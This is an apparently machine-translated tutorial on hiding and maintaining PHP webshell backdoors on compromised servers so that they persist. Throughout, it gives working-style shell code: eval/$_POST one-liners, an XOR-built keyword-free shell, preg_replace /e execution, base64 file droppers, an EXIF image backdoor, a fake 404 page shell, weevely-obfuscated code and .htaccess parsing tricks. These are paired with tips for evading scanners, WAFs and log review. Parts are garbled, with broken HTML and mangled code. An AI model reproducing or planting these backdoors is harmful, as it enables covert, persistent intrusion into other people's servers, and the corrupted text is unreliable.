After a successful test, you usually want to keep the privilege longer. The job of leaving the back door is very important, usually the backdoor is laid out including but not limited to database permissions, Web permissions, System user permissions, and so on. This article on the public back door hidden some ideas to do science.
AD:
0x00 Preface
After a successful test, you usually want to keep the privilege longer. The job of leaving the back door is very important, usually the backdoor is laid out including but not limited to database permissions, Web permissions, System user permissions, and so on. This article on the public back door hidden some ideas to do science.
Taking Php-webbackdoor as an example,
One of the most common words the backdoor might write like this
- Eval ($_post[' cmd ');? >
Or so
- $_post[' cmd ');? >
Of course, this is only called the function is different, about PHP disabled functions in the php.ini:disable_functions search.
But there are many ways in which OPS can intuitively look for our shells, such as
File backup compare to find exception by filename/Modify time/Size
Through the Webshell backdoor scan script found, such as scanbackdoor.php/pecker/shelldetect.php and various scanners and so on
Find back door through Access.log access log
Or, our test will be blocked by a WAF, a warning log, and so on.
For common detection methods, summarize the following seven common techniques to hide the shell
0x01 evasion
Look at the various scanning backdoor code to know, to stay a well-known, raves keyword in the shell is absolutely impossible
Common keywords such as:
System command execution: Systems, PassThru, shell_exec, exec, Popen, Proc_open
Code execution: eval, assert, Call_user_func,base64_decode, Gzinflate, gzuncompress, Gzdecode, str_rot13
Files include: Require, require_once, include, Include_once, file_get_contents, File_put_contents, fputs, fwrite
Used to have friends wit use $_post[0] ($_post[1]) to execute orders, but now also difficult to escape the scanner, but Vientiane changes, the construction method is infinite
Tudouya students on the freebuf to give [a construction technique] (http://www.freebuf.com/articles/web/33824.html) use
-
- @$_++; //$_ = 1
- $__=("#"^"|"); // $__ = _
- $__.=("." ^"~"); //_p
- $__.=("/"^"`"); //_po
- $__.=("|" ^"/"); //_pos
- $__.=("{"^"/"); //_post
- ${$__}[! $_](${$__}[$_]); //$_post[0] ($_post[1]);
- ?>
Construction generated, of course, too intuitive to write like this
- $_++; $__=("#"^"|"). ("." ^"~"). ("/"^"`"). ("|" ^"/"). ("{"^"/");@${$__}[! $_](${$__}[$_]);? >
Then fill in some common code to disguise, a simple "kill-free" shell sample appears
Execute without error, bypassing normal scanners, and can also rely on new temporary shells
0x02 characteristics
It is also an interesting way to execute commands with the help of grammatical features. Borrowing PHP's syntax when dealing with variables, it analyzes whether the data in the double quotes contains variables (and parses their values)
eg.:
- ${@eval (phpinfo ())}
{} can parse variable contents in double quotation marks, keep execution after error
Then you can start to build a hidden back door, but here we construct the command to be executed by force in the function, yes, it is preg_replace
- "//e",$_post[' cmd '],"");? >
This play obviously has been in the scanner blacklist, simple modification under
-
- function Funfunc ($str) {}
- Echo Preg_replace ("/(.+?) <\/title>/ies ", <span> ' Funfunc (" \1 ") ', <span>$_POST[<span>" cmd "]); </span></span></span></span></span></li><li>?> </li></ol ><p> executed, not found </p><p></p><p> executed in a way that is obvious, the regular match after {${phpinfo ()}} passed into the Funfunc caused code execution </p><ol><li>funfunc (<span> "{${phpinfo ()}}") </span></li></ol><p > Another method </p><ol><li><?php @assert (<span> "\ $arr =\" ".<span>$_get[<span>" cmd '].<span> "\"; ");? > </span></span></span></span></li></ol><p></p><p>0x 03 contains </p><p> file contains a method that has been played by everyone, but contains also tricks </p><p> ordinary file contains may be just an include contains a txt or JPG, or even leave a containing vulnerability, But scanners are also easy to find, more out of the included files are also easy to find </p><p> see this script </p><ol><li><?php </li><li> < Span>if (@isset (<span>$_get[content)) </span></span></li><li> {</LI><li> <span> $fp =<span>fopen (<span> ' README ',<span> ' W '); </span></span></span></span></li><li> <span>file_put_contents (< Span> ' README ',<span> "<?php\r\n"); </span></span></span></li><li> @<span>file_put_contents (<span> ' README ', <span>$_get[content],file_append); </span></span></span></li><li> fclose (<span> $fp); </span></li><li> <span>require <span> ' README ';} </span></span></li><li>?> </li></ol><p> to solve a problem, the demand shell can be used with the build, </p><p></p><p> unfortunately due to the file_put_contents and other functions are too sensitive, it is easy to scan the discovery </p><p> The way the code is generated creates the shell, which is generated with access. </p><ol><li><?php @<span>fputs (<span>fopen (<span> Base64_decode (<span> ' CGX1Z2LUX20UCGHW '), W), <span>base64_decode (<span> ' PD9WAHAGQGFZC2vydcgkx1bpu1rbj2ntzcddkts/pg== ')); </span></span></span></span></span></span></li><li>?> </ Li></ol><p> can evade some scanners, but this mode is also more compelling, the creation of new files to do a simple hide to avoid avira .</p><p> of course, the new concepts such as heuristics do not consider the < /p><p> in this way can not meet the needs of the situation, the witty attackers again picked up pictures </p><ol><li><?php <span> $exif =exif_read_ Data (<span> './lol.jpg ');p reg_replace (<span> $exif [<span> ' make '],<span> $exif [<span > ' Model '],<span> ');? > </span></span></span></span></span></span></span></li>< /ol><p> reference: A backdoor hidden in the JPG image exif </p><p> This time no more simple copy/b to generate the picture horse, borrowing preg_replace to execute a specific flag of the file as feasible </p ><p></p><p> Here you may be prompted for call to undefined function exif_read_data () </p><p> need to modify php.ini, Extension=php_exif.dll</p><p> change its load order to the back of Extension=php_mbstring.dll </p><p></p> <p> can see that this picture backdoor with the help of Preg_replace \e parameters, relying on the PHP variable parsing execution, and used the Base64 encoding, and finally rely on the file identification of a complete shell to be pieced together, as the first backdoor hidden children's shoes a small reminder </p><p> of course, as long as there are included points, the form of the containing file is diverse, even contains error_log ( Although it may be considered closed), only unexpected ... </p><p>0x04 stealth </p><p> in order to keep visitors from discovering the back door, smart security researchers will confuse </p><ol ><li><! DOCTYPE HTML public <span> "-//IETF//DTD html 2.0//en" > </span></li><li> <ptml><pe Ad> </li><li> <title>404 not Found
-
-
Not Found
The requested URL is not found on this server.
-
-
-
- @preg_replace ("/[checksql]/e",$_post[' cmd '),"Saft");
- ?>
With the above HTML rendering, the browsing page has begun to disguise 404 to Patinia.
But you can hide from the visitor. Log analysis, for better hiding in a large number of logs, construct the following script
-
- Header (' http/1.1 404 ');
- Ob_start ();
- @fputs (fopen (base64_decode (' CGX1Z2LUX20UCGHW '), W),base64_decode (' pd9wahagqgfzc2vydcgkx1bpu1rbj2ntzcddkts/pg== '));
- Ob_end_clean ();
- ?>
Access to the real 404, yes, the log is the same
But at the moment the current directory has generated the script we want to connect to
0x05 confusion
Children's shoes with the weevely tool should know that the resulting kill-free shell looks like this
-
- $penh ="sigpvaw4oyxjyygixlfc2xpy2uojgesgijgmojgepltgimpkskpgikttly2hvicc8lycgiujgigsugijz4no30=";
- $kthe ="JGEPPJGIMPEYRRPSGIDWCYC7ZWNOBYANPCCGIUGIJGSUJZ4NOGI2V2YWWOYGIMFZZTY0X2GIRLY2GI9KGIZSHWCMVN";
- $FTDF = str_replace ("w", "" ","stwrw_wrwepwlwawcwe ");
- $wmmi ="X3jlcgigxhy2ugioyxgijyyxkojy9bxlx3pvgixzxs8nlcgicvxhmvjyksigfycmf5kccnlccrgijyk";
- $zrmt ="Jgm9j2nvdwgi50jzskgiyt0gikx0ngipt0tjrgittpzihyzxnldcgkysk9psgidvbycggijgiiygjgmo";
- $SMGV = $ftdf ("F", " " ", " bfafsfef6f4_fdfefcodfe ");
- $jgfi = $ftdf ("L", "" "," Lclrlelaltel_functlilon ");
- $RDWM = $jgfi (", $SMGV ($ftdf (" GI "," " , $zrmt. $kthe. $wmmi. $penh))); $rdwm ();
- ?>
After the terminal is connected like this
Ps: Forgot to modify the terminal code: (
The way to kill it is to generate a random name variable in the fixed area, and then use Str_replace to flatten the Base64_decode to execute the command.
Of course, it's confusing at the code level to avoid scanners.
A more common method of confusing:
Modify file Time
Renamed into the folder after uploading, so that people can not visualize the file exception
File size spoofing (at least look at size like a normal script)
Choose your hiding path and access as little as possible
Malformed Directory%20
About the space directory, or relatively easy to find
0X06 parsing
Using. htaccess, add parse Backdoor
Such as:
- AddType application/x-httpd-php. jpg
Above take weeverly as an example
0x07
Summing up the above method, most is nothing more than a process of constructing a loophole, the code of the loophole constructs can have how wonderful, the back door can be more wonderful. Can write slender graceful, also can make simple rough, just apply occasion is different only. If you can integrate ideas well, It is not difficult to construct your own hidden shell. The above is only a summary of the experience, you have interesting ideas also hope to enlighten.
The above describes the PHP backdoor hiding and maintenance skills, including aspects of the content, I hope that the PHP tutorial interested in a friend helpful.
